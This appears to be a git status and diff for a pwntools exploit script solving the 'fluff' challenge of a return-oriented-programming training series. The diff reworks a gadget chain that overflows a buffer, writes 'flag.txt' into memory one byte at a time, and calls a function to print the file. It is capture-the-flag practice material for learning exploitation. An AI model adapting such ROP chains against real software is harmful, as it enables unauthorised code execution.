deleted: x86_64/badchars/core

	modified:   x86_64/fluff/.gdb_history
	deleted:    x86_64/fluff/core
	modified:   x86_64/fluff/exploit.py
	deleted:    x86_64/ret2win/core
	deleted:    x86_64/split/core
	deleted:    x86_64/write4/core

1 files changed, 14 insertions, 16 deletions

diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = {
 def write_str(dest, string, payload):
     payload += p64(0x00000000004006a3)
     payload += p64(dest)
-    for c in string:
-        payload += p64(0x40062a)
-        payload += p64(0x4000) # if things go wrong, check endian/order
+    payload += p64(0x0000000000400610)
+    payload += p64(1)
+    payload += p64(0x40062a)
+    payload += p64(0x4000)
+    payload += p64(letter_lookups[string[0]] - 0x3ef2)
+    payload += p64(0x400628)
+    payload += p64(0x400639)
+
+    
+    for c in string[1:]:
+        payload += p64(0x40062b)
         payload += p64(letter_lookups[c] - 0x3ef2)
-
         payload += p64(0x0000000000400610)
-        payload += p64(0)
-
+        payload += p64(1)
         payload += p64(0x400628)
-
         payload += p64(0x400639)
 
     return(payload)
         
 
-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
 payload = b''
 for c in range(40):
     payload += b'a'
 
 payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
 payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0) 
 payload += p64(0x0000000000400510)
 
-payload += b"\n"
 prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
 prog.interactive()